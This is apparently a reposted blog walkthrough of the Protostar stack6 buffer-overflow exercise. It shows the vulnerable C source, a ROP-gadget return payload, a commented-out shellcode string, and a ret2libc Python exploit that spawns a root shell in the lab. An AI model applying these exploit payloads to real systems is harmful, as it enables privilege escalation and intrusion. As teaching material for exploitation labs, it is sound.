Doing ret2libc with a Buffer Overflow because of restricted return pointer

本文链接：https://blog.csdn.net/weixin_42732173/article/details/112306930

stack6

Stack6 looks at what happens when you have restrictions on the return address.

This level can be done in a couple of ways, such as finding the duplicate of the payload ( objdump -s will help with this), or ret2libc , or even return orientated programming.

It is strongly suggested you experiment with multiple ways of getting your code to execute here.

source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

open it in gdb and run it:

we can see that the only addresses that start with bf are on the stack which means we cannot return to the stack anymore.

How can we run our shellcode if we cannot return to the stack where we place our shellcode?

we can return to the return address itself.

this address where we jump to, the 0x080 is a gadget.(see https://github.com/JonathanSalwan/ROPgadget)

import struct
padding="0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
ret=struct.pack("I", 0x080484f9)
eip=struct.pack("I", 0xbffff6a0+50)
trap='\xcc'*100
#nopslide='\x90'*220
#payload="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print(padding+ret+eip+trap)

$ python exploit.py | /opt/protostar/bin/stack6
input path please: got path 0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�QQQQRRRRSSSS���������������������������������������������������������������������������������������������������������
Trace/breakpoint trap

ret2libc

an example:

#include <stdlib.h>
void main(){
    system("/bin/sh");
}

now return to stack6 program

first, we need to find the address of system:

how can we find the address of "/bin/sh"?

we can use strings to find all strings in libc, and with '-t x' we can print the offset inside this file as hex.

$ strings -a -t x /lib/libc-2.11.2.so | grep /bin/sh
 11f3bf /bin/sh

and then we can simply add this offset to the address libc is loaded to. that is the real address of "/bin/sh".

so our exploit.py can be modified as:

import struct
padding="0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
system=struct.pack("I", 0xb7ecffb0)
return_after_system="AAAA"
bin_sh=struct.pack("I", 0xb7fb63bf)
print(padding + system + return_after_system + bin_sh)

use (payload ; cat) format:

$ (python stack6.py ; cat) | /opt/protostar/bin/stack6
input path please: got path 0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO���QQQQRRRRSSSS���AAAA�c��
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
whoami
root

pwned! and we never executed any code on the stack!